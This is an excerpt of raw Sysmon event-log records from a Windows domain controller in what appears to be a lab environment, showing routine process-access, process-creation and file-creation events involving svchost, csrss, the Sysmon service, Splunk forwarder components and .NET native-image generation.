13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9145-6005-4202-00000000A301}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9145-6005-4202-00000000A301}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-9145-6005-4202-00000000A301}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:46.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9146-6005-4502-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:46.501{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9146-6005-4502-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:46.501{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9146-6005-4502-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:47.938{59A5CD1D-9146-6005-4502-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\844-0\System.Activities.Core.Presentation.dll2021-01-18 13:46:47.938 10341000x80000000000000006447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.422{59A5CD1D-9147-6005-4602-00000000A301}28684956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9147-6005-4602-00000000A301}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9147-6005-4602-00000000A301}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9147-6005-4602-00000000A301}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program 